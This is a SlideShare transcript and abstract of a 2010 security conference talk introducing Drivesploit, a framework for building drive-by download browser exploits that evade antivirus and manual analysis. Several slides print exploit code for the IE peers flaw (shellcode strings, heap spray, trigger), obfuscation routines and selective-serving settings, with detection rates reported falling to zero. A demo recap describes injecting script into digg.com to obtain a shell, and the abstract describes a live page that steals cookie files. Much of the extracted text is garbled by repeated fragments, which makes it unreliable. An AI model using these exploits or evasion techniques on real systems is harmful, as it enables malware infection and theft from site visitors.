掛馬免殺
DRIVESPLOIT
CIRCUMVENTING
AUTOMATED AND
MANUAL DETECTION
OF BROWSER EXPLOITS
       Wayne Huang, Cofounder & CTO
    ...
One type of browser exploit:



Drive-by Downloads defined



             2
Drive-by-Download Explained
• Hackers distribute malware by
  "poisoning" legitimate websites

• Typical: injects maliciou...
Drive-by-Download Explained
• Affected websites:
  – Essentially becomes a delivery mechanism for
    malware
  – Appear n...
Drive-by Download Incidents

• Aurora (Google)
 – June 2009-Feb 2010
 –TTargeted attack
         t d tt k
 – IE 0day CVE-2...
Drive-by Download Incidents

• DNF666 Mass SQL Injection
 – Since March, 2010
 –JJun: Adobe 0day CVE-2010-1297
        Ad ...
CNN
GameSpot
US Treasury




http://thompson.blog.avg.com/2010/05/treasury‐website‐hacked.html
PlayStation.com
Washington Post
Dissecting Drive-By Downloads




       Page + Browser
       Page + Browser
           Exploit
         Payload =      E...
Dissecting Drive-By Downloads




                               Page + Browser
                               Page + Brow...
Dissecting Drive-By Downloads



      Exploit!
                               Page + Browser
                            ...
Dissecting Drive-By Downloads



   Exploit!
              Exploits / droppers
              Exploits / droppers

Dropper ...
Dissecting Drive-By Downloads




        Exploits / droppers
        Exploits / droppers

                              E...
Dissecting Drive-By Downloads




         Exploits / droppers
         Exploits / droppers

                             ...
Dissecting Drive-By Downloads

         But who would visit?
         But who would visit?
        The key now is TRAFFIC
...
(1) Legitimate, injectable sites


          URL Generators
                               Landing Site
                  ...
(1) Legitimate, injectable sites


                URL Generators
                                  Landing Site
         ...
(1) Legitimate, vulnerable sites


                     URL Generators
                                       Landing Site...
(2) Man-in-the-Middle
                           WAN                             LAN

                     URL Generators
...
LIVE DEMO 1


http://digg.com/software/
Internet_Storm_Center_
Internet_Storm_Center_
        _      _
Diary_2010_02_27
  ...
Live demo recap
Live demo recap




        Injected javascript in digg.com
Live demo recap
1. Inject javascript into digg.com
     j    j       p         gg
2. Javascript loads iframe from our doma...
MOTIVATION


 We provide solutions that monitors
    p
   websites and detect malicious
           contents 24 7
         ...
MOTIVATION


Most technologies are developed on
           our own, BUT,


We also integrate anti-virus, whose
 licenses a...
MOTIVATION


 We spend a lot of time testing our own
  technologies, and selecting anti-virus
              technologies
 ...
MOTIVATION


We need a good framework to help us
          g                      p
 replicate, manipulate, and mutate
   ...
DRIVESPLOIT
  IS BORN

ON TOP OF
METASPLOIT
 31
INITIAL FINDINGS

ANTIVIRUS CAPABILITIES
DIFFER GREATLY!

DESKTOP AND API VERSIONS
DIFFER GREATLY IN PERFORMANCE

COST != ...
Antivirus vs. Drive-bys


          URL Generators
                               Landing Site
                           ...
Antivirus vs. Drive-bys

                               JAVASCRIPT
          URL Generators
                              ...
Antivirus vs. Drive-bys

                               JAVASCRIPT
          URL Generators
                              ...
Why we can’t rely on PE detection
     • Exploit server domains are often taken down
       after a few days, but the inje...
THE TAO:
ECMA-SCRIPTS
ECMA SCRIPTS

 JAVASCRIPT
  VBSCRIPT
   ADOBE JS
ACTIONSCRIPT
         37
JAVASCRIPT!! (ECMA-SCRIPT)


          URL Generators
                               Landing Site
                        ...
JAVASCRIPT!! (ECMA-SCRIPT)


          URL Generators
                               Landing Site
                        ...
JAVASCRIPT!! (ECMA-SCRIPT)


          URL Generators
                               Landing Site
                        ...
JAVASCRIPT!! (ECMA-SCRIPT)


          URL Generators
                               Landing Site
                        ...
JAVASCRIPT!! (ECMA-SCRIPT)


          URL Generators
                               Landing Site
                        ...
Drive-By wants to…
• Avoid detection at the victim's
  desktop
• Avoid detection by UTM/gateways
• Avoid detection
  by
  ...
Drive-By wants to…
CONCLUSION:
 Reduce exposure:
  Serve SELECTIVELY

 Avoid detection and analysis:
  Mutate well
Serve Selectively
HTTP LEVEL:
Serve only to:
• Fresh IPs (serve once per IP)
  set HTTP::client::onlyonce true
• Particula...
SCRIPT MUTATION

  For exploit
  For
  F payload
         l d
      46
The goal is not to "obfuscate"...
JAVASCRIPT EXPLOIT DISEC

   Shellcode
   M Corrupt
   Heapspray
    Trigger
       gg
JAVASCRIPT EXPLOIT DISEC

   Shellcode   <script>var shellraw = 
               "%u7679%u4673%u757b%u924e%u
              ...
JAVASCRIPT EXPLOIT DISEC

   Shellcode   var j_object = 
               document.createElement('body');

               j_...
JAVASCRIPT EXPLOIT DISEC

   Shellcode    var counter;var shellcode = 
                unescape(shellraw);
               ...
JAVASCRIPT EXPLOIT DISEC

   Shellcode   <button id j_id
               <button id='j id' 
               onclick='bootstr...
JAVASCRIPT EXPLOIT DISEC

   Shellcode
                OBFUSCATED
   M Corrupt       BLOB 
   Heapspray
                  ...
Dissecting Drive-By Downloads



      Exploit!
                               Page + Browser
                            ...
JAVASCRIPT EXPLOIT DISEC

        Shellcode
                     OBFUSCATED
        M Corrupt       BLOB 
        Heapspra...
JAVASCRIPT EXPLOIT DISEC

        Shellcode
                     OBFUSCATED
        M Corrupt       BLOB 
                ...
JAVASCRIPT EXPLOIT DISEC

        Shellcode
                     OBFUSCATED
        M Corrupt       BLOB 
                ...
MUTATION FEATURES
IMPLEMENTED
SO FAR
1. Javascript Random Variable Auto
Replacement
• Accepts a piece of javascript
      p     p        j       p
• Parses the...
1. Javascript Random Variable Auto
Replacement
randomized =
Rex::Exploitation::DriveSploit::obfusca
  tejs(js,
    j (j ,
...
2. Javascript Concat String
 Obfuscation
 Obf     ti
arr =
Rex::Exploitation::DriveSploit.obfusca
tejs(shellcode,
t j ( h ...
2. Javascript Concat String
Obfuscation
Obf     ti
%u7679%u4673%u757%u924e
% 7679% 4673% 757% 924

A1   =   "%u7";       A...
2. Javascript Concat String
Obfuscation
Obf     ti
%u7679%u4673%u757%u924e
% 7679% 4673% 757% 924

                       ...
2. Javascript Concat String
Obfuscation
Obf     ti
%u7679%u4673%u757%u924e
% 7679% 4673% 757% 924


B1 = A1+A2;           ...
2. Javascript Concat String
Obfuscation
Obf     ti
%u7679%u4673%u757%u924e
% 7679% 4673% 757% 924
 A3 = "u4673%”;A4 = "u75...
3. Javascript Random Text Insertion
 insertret =
 Rex::Exploitation::DriveSploit.getInse
 rtion(shellcode, 4, 6, 10)

 she...
3. Javascript Random Text Insertion
 insertret =
 Rex::Exploitation::DriveSploit.getInse
 rtion(shellcode, 4, 6, 10)
 # in...
4. Numeric Literal Mutation
 slackspace =
       p
 Rex::Exploitation::Drivespl
 oit.obfuscateNumber(0x86000
 oit obfuscat...
4. Numeric Literal Mutation
 slackspace =
       p
 Rex::Exploitation::Drivespl
 oit.obfuscateNumber(0x86000
 oit obfuscat...
4. Numeric Literal Mutation
 slackspace = 0x86000
 slackspace =
  l k
 (246*2)+(5676*96)+(34*4)+8+
 (3332*1)
Trigger Prevention

        Shellcode
                     OBFUSCATED
        M Corrupt       BLOB 
        Heapspray
    ...
Trigger prevention
• <div onload
• <img onload
• var a=1; var b=0;
 do {
    useless code;
 } while (a==b);
         (a  b...
TESTING IT OUT
Using the IE peers exploit as example
CVE‐2010‐0806
(MS10‐018)
PLAIN: 17/42
RANDOM VARS: 16/42 (某採!)
INJECT SC: 13/42
RANDVAR+CONCAT SC+INJECT SC
11/42
ROUGHLY 6/17
ANTI-VIRUS
ANTI VIRUS
DETECTS BASED ON
SHELLCODE
(FOR THIS EXPLOIT)
CONCAT SC+CODE: 1/42
INJECT SC+CONCAT CODE: 0/42
RANDVAR+INJECT SC+CONCAT
CODE: 0/42
ANTIVIRUS
DESKTOP VERSION
IS MUCH STRONGER
ANTIVIRUS DESKTOP VERSION
• Can monitor host environment
 – Hook into browsers
 – Easier to get raw form of
   exploit


•...
AntiVirus Desktop Kung Fu
                           To   Ag   Sc   Aa   Ky
 Plain                     ✖    ✖    ✔    ✔   ...
AntiVirus Desktop Kung Fu
                           To   Ag   Sc Aa   Ky    M
 Plain                     ✖    ✖    ✔ ✔   ...
LIVE DEMO 2
DESKTOP
ANTIVIRUS
BYPASS
5. FINGERPRINTING-
BASED ENCRYPTION
Wepawet doesn’t tell much




             88
89
90
91
92
Browser Feature Table
                                                       IE7     FF      Safari         Opera   Chrome...
5. Fingerprinting-Based Encryption
Summary
• "This exploit works only for IE6"
   This                        IE6
• "Give ...
5. Fingerprinting-Based Encryption
Summary

 A=Check1();
 B=Check3();
 C=Check4();
 D Check6();
 D=Check6();
 E=Check8();
...
5. Fingerprinting-Based Encryption
Summary

 A=Check1();    A=Check6();
 B=Check3();    B=Check12();
 C=Check4();    C=Che...
5. Fingerprinting-Based Encryption
Summary

 A=Check1();    A=Check6();
                               One‐time key
 B=Che...
Why not Anti-Virus?
• AV is to install on desktops / notebooks
                            p
• Complicated normal behavior...
Javascripts are not harmful
to th
t the environment…
          i       t




                99
… so they are usually not reused
AV no good because drive-by-downloads are in:
      g                   y
• Disposable Ja...
Javascript Packing Is a Norm
• Packing is widely used by legitimate code!
  – To protect javascript source code
  – To red...
… OK so AV doesn t work (that well)…
           doesn’t            well)
How about behavior-based approaches?




        ...
Defeating Behavior Analysis
1. Use VBScript
  –   Exploits in VBScript
  –   URL generators in VBScript
  –   Exploits in ...
Defeating Behavior Analysis
3. Fingerprint-based encryption
      g p                yp

3. Little b effective techniques
...
Future Work
• Randomly chop up scripts and split into
  individual f l
    d d l files
• Generating VBscript instead of ja...
Discussion
• The Panopticlick experiment by
           p         p         y
  Eckersley of EFF
  – 94.2% of "typical desk...
THANK YOU!
wayne@armorize.com
@waynehuang
@drivesploit
http://www.drivesploit.org
http://www drivesploit org


Credits: wa...
References
• James Lee, Using guided missles in drive-bys
  http://www.slideshare.net/egypt/using guided missiles in
  htt...
Upcoming SlideShare
Loading in …5
×

Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection

17,041 views
16,888 views

Published on

Given at black hat and DEF CON 2010 by Wayne Huang and team.

https://www.defcon.org/html/defcon-18/dc-18-speakers.html#Huang
http://www.blackhat.com/html/bh-us-10/bh-us-10-briefings.html#Huang

DRIVESPLOIT: CIRCUMVENTING BOTH AUTOMATED AND MANUAL DRIVE-BY-DOWNLOAD DETECTION

This year saw the biggest news in Web security ever--Operation Aurora, which aimed at stealing source code and other intellectual properties and succeeded with more than 30 companies, including Google. Incidence response showed that the operation involved an IE 0-day drive-by-download, resulting in Google's compromise and leak of source code to jump points in Taiwan. The US Government is so concerned that they issued a demarche to the Chinese government.

Using real, live examples, we will show how easy it is to exploit injection-based, XSS-based, and CSRF-based vulnerabilities in FaceBook, Google, Digg, LinkedIn, and other popular websites, and inject drive-by downloads.

If drive-bys are so easy to inject into high-traffic websites, then the question becomes, how easy it is to make them undetectable by automated malware scanning services (such as Google's) and by human manual inspection? We will demonstrate how easy it is to defeat automated detection mechanisms and overview commonly used techniques.

We will reveal for the first time, in this conference, some very advanced techniques that are almost impossible to overcome by automated analysis in the past, now, and in the future. We will release Drivesploit, a drive-by download exploit framework implemented on top of Metasploit. We will go into depth on two particular techniques supported by Drivesploit's a) javascript obfuscation based on behavior-based fingerprinting, and b) javascript timelock puzzles. We will have live demos to show how this technique easily defeats both automated AND manual detection.

At the very beginning of our talk, we will be giving out a digg.com page, which we have infected with a drive-by download created with Drivesploit. Visiting this page with the right browser will trigger the exploit and download a malware that steals browser cookie files. The whole process will be undetectable by antivirus. The actual javascript drive-by code contains a secret phrase. We will give out an ipad to whomever from the audience that is able to correctly deobfuscate the javascript and give out the secret phrase.

Finally, we will present case studies on systems and processes that the largest organizations have put in place in order to fight against Web-based malware. We will also present case studies of our incidence response efforts with organizations hit by Web malware injections such as Google's aurora incident. Based in Taiwan, Co-speaker Wayne has been personally involved in such incidence response efforts since the late 90's.

All source codes related to POC exploits against FaceBook, Google, Digg, LinkedIn, etc, as well as source code of Drivesploit, will be released as open source at the conference.

Attendees will gain the following:

1. Understanding of drive-by downloads and associated terminologies.

2. Information about various drive-by download infection vectors.

3. Appreciation of tools helpful for drive-by analysis, including Malzilla, spikermonkey, rhino, burp and wepawet

4. Realize why drive-by downloads are hard to analyze and detect. Why antivirus fail, why behavior-based approaches fail, and why even manual efforts are difficult

5. Learning the Drivesploit framework and how it can be used to develop poc drive-bys

6. Learning two new deadly techniques: behavior-based browser finterprinting and javascript timelock puzzles

7. Learning how to implement above two using Drivesploit to defeat both automated and manual drive-by analysis

8. Knowledge about the available countermeasures to this threat

0 Comments
4 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
17,041
On SlideShare
0
From Embeds
0
Number of Embeds
9
Actions
Shares
0
Downloads
514
Comments
0
Likes
4
Embeds 0
No embeds

No notes for slide

Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection

  1. 1. 掛馬免殺 DRIVESPLOIT CIRCUMVENTING AUTOMATED AND MANUAL DETECTION OF BROWSER EXPLOITS Wayne Huang, Cofounder & CTO Fyodor Yarochkin Antonio Rohman Fernandez Chris Hsiao Armorize Technologies, Inc. @waynehuang wayne@armorize.com @ i
  2. 2. One type of browser exploit: Drive-by Downloads defined 2
  3. 3. Drive-by-Download Explained • Hackers distribute malware by "poisoning" legitimate websites • Typical: injects malicious iframes into HTML content 3
  4. 4. Drive-by-Download Explained • Affected websites: – Essentially becomes a delivery mechanism for malware – Appear normal • Victims – Do not need to "click" or "agree to" anything – Simply connecting to the website executes the attack 4
  5. 5. Drive-by Download Incidents • Aurora (Google) – June 2009-Feb 2010 –TTargeted attack t d tt k – IE 0day CVE-2010-0249 – Confirmed publicly by Google, Adobe Systems, Juniper Networks and R kS d RackSpace – Total of 34 organization targeted g g
  6. 6. Drive-by Download Incidents • DNF666 Mass SQL Injection – Since March, 2010 –JJun: Adobe 0day CVE-2010-1297 Ad b 0d CVE 2010 1297 – Victims: Wall Street Journal, Jarusalem P t etc J l Post, t – dnf666.net, robint.us, 2677.in, 4589.in, 22d f 4589 i 22dnf.com
  7. 7. CNN
  8. 8. GameSpot
  9. 9. US Treasury http://thompson.blog.avg.com/2010/05/treasury‐website‐hacked.html
  10. 10. PlayStation.com
  11. 11. Washington Post
  12. 12. Dissecting Drive-By Downloads Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d 12
  13. 13. Dissecting Drive-By Downloads Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d <script>var sc = unescape(" %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <  200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){  e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";  window.setInterval(ev2, 50); } function ev2(){ p = "  13
  14. 14. Dissecting Drive-By Downloads Exploit! Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d <script>var sc = unescape(" %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <  200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){  e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";  window.setInterval(ev2, 50); } function ev2(){ p = "  14
  15. 15. Dissecting Drive-By Downloads Exploit! Exploits / droppers Exploits / droppers Dropper executes Exploit Server 15
  16. 16. Dissecting Drive-By Downloads Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server 16
  17. 17. Dissecting Drive-By Downloads Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 17
  18. 18. Dissecting Drive-By Downloads But who would visit? But who would visit? The key now is TRAFFIC Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 18
  19. 19. (1) Legitimate, injectable sites URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 19
  20. 20. (1) Legitimate, injectable sites URL Generators Landing Site Landing Site  May-Ongoing:/ DNF666 mass SQ ay O go Exploits droppers 666 ass SQL g Exploits / droppers injections Exploit Server  May-June: Shared hosting compromise, Malware GoDaddy, RackSpace, GoDaddy RackSpace Network Solutions, BlueHost, DreamHost Malware Server  Continuous targeted attacks 20
  21. 21. (1) Legitimate, vulnerable sites URL Generators Landing Site Landing Site  Mass SQL injections Exploits / droppers Exploits / droppers  Mass hosting compromises Exploit Server  Directly inside HTML / PHP / ASP Malware  Hidden inside WorldPress files  Hidden inside DB Malware Server  Hidden inside DB stored procedures 21
  22. 22. (2) Man-in-the-Middle WAN LAN URL Generators Landing Site Landing Site  No tampering of website p Exploits / droppers g Exploits / droppers  LAN: ARP spoofing via ZXARPS and other Exploit Server tools Malware  WAN: March 2009, middle of route 2009 route, tw.msn.com, taiwan.cnet.com, others Malware Server Cisco advisory: http://tools.cisco.com/security/center/viewAlert.x?alertId=17778 22
  23. 23. LIVE DEMO 1 http://digg.com/software/ Internet_Storm_Center_ Internet_Storm_Center_ _ _ Diary_2010_02_27 23
  24. 24. Live demo recap
  25. 25. Live demo recap Injected javascript in digg.com
  26. 26. Live demo recap 1. Inject javascript into digg.com j j p gg 2. Javascript loads iframe from our domain zcrack.org 3. Metasploit (drivesploit) is running on zcrack.org, zcrack org serves ie peers exploit 4. Bypasses AV 5. IE visitor attacked, IE crashes, meterpreter starts, jumps process to notepad.exe notepad exe 6. We have a shell :)
  27. 27. MOTIVATION We provide solutions that monitors p websites and detect malicious contents 24 7 t t 24x7 We use multiple behavior-, heuristic-, p , , and signature-based technologies 27
  28. 28. MOTIVATION Most technologies are developed on our own, BUT, We also integrate anti-virus, whose licenses are $expensive$ 28
  29. 29. MOTIVATION We spend a lot of time testing our own technologies, and selecting anti-virus technologies t h l gi The key is: how good are we (and them) at detecting NEW drive-by downloads 29
  30. 30. MOTIVATION We need a good framework to help us g p replicate, manipulate, and mutate exploits found in the wild --into NEW derivatives 30
  31. 31. DRIVESPLOIT IS BORN ON TOP OF METASPLOIT 31
  32. 32. INITIAL FINDINGS ANTIVIRUS CAPABILITIES DIFFER GREATLY! DESKTOP AND API VERSIONS DIFFER GREATLY IN PERFORMANCE COST != PERFORMANCE
  33. 33. Antivirus vs. Drive-bys URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 33
  34. 34. Antivirus vs. Drive-bys JAVASCRIPT URL Generators Landing Site Landing Site JAVASCRIPT Exploits / droppers Exploits / droppers JAVASCRIPT Exploit Server Malware PE BINARY PE BINARY Malware Server Controller 34
  35. 35. Antivirus vs. Drive-bys JAVASCRIPT URL Generators Landing Site Landing Site JAVASCRIPT Exploits / droppers Exploits / droppers JAVASCRIPT Exploit Server Malware PE BINARY PE BINARY Malware Server We will detect  We will detect Controller 35 this part!!
  36. 36. Why we can’t rely on PE detection • Exploit server domains are often taken down after a few days, but the injected URL generators and the exploit servers live on – Attack reported to the hosting / registrar – Domain banned by ISPs – Purchased duration was over • We want to detect the injection so our customers can remove it • Actually statically detecting javascript exploits is Actually, quite difficult 36
  37. 37. THE TAO: ECMA-SCRIPTS ECMA SCRIPTS JAVASCRIPT VBSCRIPT ADOBE JS ACTIONSCRIPT 37
  38. 38. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 38
  39. 39. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Controller 39
  40. 40. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Controller 40
  41. 41. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server (METASPLOT) Controller 41
  42. 42. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers PAYLOAD Exploit Server meterpreter (METASPLOT) (memory injection) Controller 42
  43. 43. Drive-By wants to… • Avoid detection at the victim's desktop • Avoid detection by UTM/gateways • Avoid detection by b automated t t d monitors • Live for as long as possible ibl
  44. 44. Drive-By wants to… CONCLUSION: Reduce exposure: Serve SELECTIVELY Avoid detection and analysis: Mutate well
  45. 45. Serve Selectively HTTP LEVEL: Serve only to: • Fresh IPs (serve once per IP) set HTTP::client::onlyonce true • Particular referer (eg Gumblar) (eg. set HTTP::referer google.com • Particular agent string (vulnerable browser) set HTTP::agent::MSIE 7.0 • Black list set HTTP::client::blacklist false
  46. 46. SCRIPT MUTATION For exploit For F payload l d 46
  47. 47. The goal is not to "obfuscate"...
  48. 48. JAVASCRIPT EXPLOIT DISEC Shellcode M Corrupt Heapspray Trigger gg
  49. 49. JAVASCRIPT EXPLOIT DISEC Shellcode <script>var shellraw =  "%u7679%u4673%u757b%u924e%u 66b9%ub441%u018d%u7df9%u241 c%ud631%u40b7%ueb11%u043d%u M Corrupt be97%u212c%u05e1%u8335%u42fc %ub893%u227f%u98d4%u484b%u8 c90%u13e0%uf8d3%u7aba%u7278 %u2034%u49f5%u259f%u9137%u3 Heapspray 39b%u1dd5%ub1b0%u3f99%u2f43 %u3cb6%ub2a8%ub30c%u4714%u3 d7b%ue138%uf803%u66b2%u97b9 d7b% 138% f803% 66b2% 97b9 %u9335%u767a%ub805%ue201%u4 Trigger gg a2f%u85a8%u7eeb%uf93b%u414f% u257d%u78bf%u2c43%u7f99%ubb2 d%ub098%ub342%u918d%u3fb2%u 704a%u7147%u7f74%u3073%u77f9 %ubb40
  50. 50. JAVASCRIPT EXPLOIT DISEC Shellcode var j_object =  document.createElement('body'); j_object.addBehavior('#default#user M Corrupt Data'); document.appendChild(j_object); Heapspray try { for (counter=0; counter<10;  counter++) { t ){ j_object.setAttribute('s',window);} Trigger gg }  catch(e){ }window.status+= ;} catch(e){ }window status+ '';}
  51. 51. JAVASCRIPT EXPLOIT DISEC Shellcode var counter;var shellcode =  unescape(shellraw); var memory = new Array();var Buffer Ovf slackspace = 0x86000‐ (shellcode.length*2); var nops =  unescape("%u0c0c%u0c0c"); Heapspray while(nops.length<slackspace/2) {  nops+=nops; }var fillbl k =  } fillblock nops.substring(0,slackspace/2); Trigger gg delete nops; for(counter=0; counter<270;  counter++) {memory[counter] =  fillblock + fillblock + shellcode; + fillblock + shellcode;
  52. 52. JAVASCRIPT EXPLOIT DISEC Shellcode <button id j_id <button id='j id'  onclick='bootstrapper();'  style='display:none'></butt M Corrupt on> … Heapspray … … Trigger gg document.getElementById( 'j_id').onclick();
  53. 53. JAVASCRIPT EXPLOIT DISEC Shellcode OBFUSCATED M Corrupt BLOB  Heapspray DE‐ Trigger gg OBFUSCATOR Primitive Obfuscated Form F Form F
  54. 54. Dissecting Drive-By Downloads Exploit! Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d <script>var sc = unescape(" %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <  200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){  e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";  window.setInterval(ev2, 50); } function ev2(){ p = "  54
  55. 55. JAVASCRIPT EXPLOIT DISEC Shellcode OBFUSCATED M Corrupt BLOB  Heapspray DE‐ Start Trigger gg OBFUSCATOR Primitive Obfuscated Form F Form F
  56. 56. JAVASCRIPT EXPLOIT DISEC Shellcode OBFUSCATED M Corrupt BLOB  Mutate Heapspray DE‐ Start Trigger gg OBFUSCATOR Primitive Obfuscated Form F Form F
  57. 57. JAVASCRIPT EXPLOIT DISEC Shellcode OBFUSCATED M Corrupt BLOB  Mutate Heapspray DE‐ Start Trigger gg OBFUSCATOR Primitive Obfuscated Form F Prevent Form F
  58. 58. MUTATION FEATURES IMPLEMENTED SO FAR
  59. 59. 1. Javascript Random Variable Auto Replacement • Accepts a piece of javascript p p j p • Parses the javascript according to grammer • Auto replaces all variable names and function names with random names • Passes back: a) the new javascript b) a vector of old-new name mappings ) pp g
  60. 60. 1. Javascript Random Variable Auto Replacement randomized = Rex::Exploitation::DriveSploit::obfusca tejs(js, j (j , Rex::Exploitation::DriveSploit::AUTO_R ANDOM_VARS)
  61. 61. 2. Javascript Concat String Obfuscation Obf ti arr = Rex::Exploitation::DriveSploit.obfusca tejs(shellcode, t j ( h ll d Rex::Exploitation::DriveSploit::STRING CONCAT) shellcode script = arr[0] h ll d i t [0] shellcode_var = arr[1]
  62. 62. 2. Javascript Concat String Obfuscation Obf ti %u7679%u4673%u757%u924e % 7679% 4673% 757% 924 A1 = "%u7"; A3 = "u4673%"; A2 = "679%"; 679% ; A4 = "u75"; u75 ; A3 = "u4673%"; A1 = "%u7"; A4 = "u75"; u75 ; A5 = "7%u92"; 7%u92 ; A5 = "7%u92"; A2 = "679%"; A6 = "4e"; A6 = "4e";
  63. 63. 2. Javascript Concat String Obfuscation Obf ti %u7679%u4673%u757%u924e % 7679% 4673% 757% 924 A3 = "u4673%"; A4 = "u75"; u75 ; B1 = A1+A2; A1 = "%u7"; B2 = A3+A4; ; Layer 2 ay A5 = "7%u92"; 7%u92 ; B3 = A5+A6; A2 = "679%"; A6 = "4e";
  64. 64. 2. Javascript Concat String Obfuscation Obf ti %u7679%u4673%u757%u924e % 7679% 4673% 757% 924 B1 = A1+A2; B2 = A1+A2; B2 = A3+A4; ; B3 = A5+A6; ; B3 = A5+A6; B1 = A3+A4;
  65. 65. 2. Javascript Concat String Obfuscation Obf ti %u7679%u4673%u757%u924e % 7679% 4673% 757% 924 A3 = "u4673%”;A4 = "u75”; " 4673%” A4 " 75” A1 = "%u7"; A5 = "7%u92”;A2 = "679%"; A6 = "4e"; B2 = A1+A2; 4e ; B1 = A3+A4;B3 = A5+A6;C1=B1+B2; D1=C1+B3; // variable names are randomized
  66. 66. 3. Javascript Random Text Insertion insertret = Rex::Exploitation::DriveSploit.getInse rtion(shellcode, 4, 6, 10) shellcode = insertret[0] random insertion string = insertret[1]
  67. 67. 3. Javascript Random Text Insertion insertret = Rex::Exploitation::DriveSploit.getInse rtion(shellcode, 4, 6, 10) # insert a fixed 6-character random # string, for every 4-8 characters returns a) a piece of javascript containing the injected string b) Javascript variable name containing the reverted, original string
  68. 68. 4. Numeric Literal Mutation slackspace = p Rex::Exploitation::Drivespl oit.obfuscateNumber(0x86000 oit obfuscateNumber(0x86000 )
  69. 69. 4. Numeric Literal Mutation slackspace = p Rex::Exploitation::Drivespl oit.obfuscateNumber(0x86000 oit obfuscateNumber(0x86000 ) ( 6 ) (56 6 96) (3 ) 8 (333 ) (246*2)+(5676*96)+(34*4)+8+(3332*1)
  70. 70. 4. Numeric Literal Mutation slackspace = 0x86000 slackspace = l k (246*2)+(5676*96)+(34*4)+8+ (3332*1)
  71. 71. Trigger Prevention Shellcode OBFUSCATED M Corrupt BLOB  Heapspray DE‐ Start Trigger gg OBFUSCATOR Primitive Obfuscated Form F Prevent Form F
  72. 72. Trigger prevention • <div onload • <img onload • var a=1; var b=0; do { useless code; } while (a==b); (a b); • Fingerprinting-based encryption
  73. 73. TESTING IT OUT Using the IE peers exploit as example CVE‐2010‐0806 (MS10‐018)
  74. 74. PLAIN: 17/42
  75. 75. RANDOM VARS: 16/42 (某採!)
  76. 76. INJECT SC: 13/42
  77. 77. RANDVAR+CONCAT SC+INJECT SC 11/42
  78. 78. ROUGHLY 6/17 ANTI-VIRUS ANTI VIRUS DETECTS BASED ON SHELLCODE (FOR THIS EXPLOIT)
  79. 79. CONCAT SC+CODE: 1/42
  80. 80. INJECT SC+CONCAT CODE: 0/42
  81. 81. RANDVAR+INJECT SC+CONCAT CODE: 0/42
